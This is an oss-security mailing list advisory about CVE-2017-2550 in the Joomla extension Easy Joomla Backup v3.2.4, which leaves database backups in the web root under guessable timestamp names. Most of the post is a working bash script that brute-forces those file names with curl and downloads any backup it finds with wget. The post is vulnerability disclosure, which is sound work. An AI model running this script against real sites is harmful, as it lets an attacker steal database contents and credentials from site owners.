Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Date: Thu, 28 Sep 2017 08:35:38 -0400
From: "Larry W. Cashdollar" <larry0@...com>
To: Open Source Security <oss-security@...ts.openwall.com>
Subject: Joomla extension Easy Joomla Backup v3.2.4 database backup exposure

Title: Joomla extension Easy Joomla Backup v3.2.4 database backup exposure
Author: Larry W. Cashdollar, @_larry0
Date: 2017-09-07
CVE-ID:[CVE-2017-2550]
Download Site: https://joomla-extensions.kubik-rubik.de/ejb-easy-joomla-backup
Vendor: kubik-rubik
Vendor Notified: 2017-09-07
Vendor Contact:
Advisory: http://www.vapidlabs.com/advisory.php?v=200
Description: Easy Joomla Backup creates 'old-school' backups without any frills.
Vulnerability:
The software creates a copy of the backup in the web root.  The file name is easily guessable as it's just a time stamp:

http://example.com/administrator/components/com_easyjoomlabackup/backups/DOMAIN_YEAR-MONTH-DAY_H-M-S.zip

Exploit Code:
	• #!/bin/bash
	• #Larry W. Cashdollar, @_larry0 9/7/2017
	• #Bruteforce download backups for Joomla Extension Easy Joomla Backup v3.2.4
	• #https://joomla-extensions.kubik-rubik.de/ejb-easy-joomla-backup
	• MONTH=09
	• DAY=07
	• YEAR=2017
	• Z=0
	• #May need to set the DOMAIN to $1 the target depending on how WP is configured.
	• DOMAIN=192.168.0.163
	•  
	• echo "Scanning website for available backups:"
	• for y in `seq -w 0 23`; do
	•         for x in `seq -w 0 59`; do
	•                  Y=`echo "scale=2;($Z/86000)*100"|bc`;
	•                  echo -ne "\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b$CPATH $Y%"
	•         for z in `seq -w 0 59`; do
	•                  Z=$(( $Z + 1 ));
	•                  CPATH="http://$1/administrator/components/com_easyjoomlabackup/backups/"$DOMAIN"_"$YEAR"-"$MONTH"-"$DAY"_"$y"-"$x"-"$z".zip";
	•                  RESULT=`curl -s --head $CPATH|grep 200`;
	•                 if [ -n "$RESULT" ]; then
	•                  echo ""
	•                  echo "[+] Location $CPATH Found";
	•                  echo "[+] Received $RESULT";
	•                  echo "Downloading......";
	•                  wget $CPATH
	•                 fi;
	•         done
	•         done
	• done
	• echo "Completed."

Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ